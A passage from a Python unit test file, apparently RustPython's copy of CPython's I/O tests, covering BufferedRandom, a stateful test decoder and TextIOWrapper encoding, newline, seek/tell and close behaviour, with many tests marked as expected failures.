self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skip("TODO: RUSTPYTHON, fallible allocation")
@unittest.skipIf(MEMORY_SANITIZER, "MSan defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
@unittest.skip("TODO: RUSTPYTHON, pyio version depends on memoryview.cast()")
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
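# State packing example (a sketch): with self.i == 0, self.o == 6 and a
# pending buffer of b'ab', getstate() returns (b'ab', 107) because
# (0 ^ 1) * 100 + (6 ^ 1) == 107; setstate((b'ab', 107)) restores the same
# i, o and buffer.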
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
self.assertFalse(t.write_through)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertRegex(repr(t),
r"<(%s\.)?TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_recursive_repr(self):
# Issue #25455
raw = self.BytesIO()
t = self.TextIOWrapper(raw)
with support.swap_attr(raw, 'name', t):
try:
repr(t) # Should not crash
except RuntimeError:
pass
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=False)
t.write("AB\nC")
self.assertEqual(r.getvalue(), b"")
t.reconfigure(line_buffering=True) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nC")
t.write("DEF\nG")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.write("H")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nG")
t.reconfigure(line_buffering=False) # implicit flush
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
t.write("IJ")
self.assertEqual(r.getvalue(), b"AB\nCDEF\nGH")
# Keeping default value
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, False)
t.reconfigure(line_buffering=True)
t.reconfigure()
t.reconfigure(line_buffering=None)
self.assertEqual(t.line_buffering, True)
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# try to get a user preferred encoding different from the current
# locale encoding to check that TextIOWrapper() uses the current
# locale encoding and not the user preferred encoding
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
@unittest.skipIf(sys.flags.utf8_mode, "utf-8 mode is enabled")
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8":  # , "utf-16-be", "utf-16-le"
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
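# With b"A" * 127 + b"\r\nB", the '\r' is the 128th character and the '\n'
# the 129th, so the pair straddles the first 128-character read below.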
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
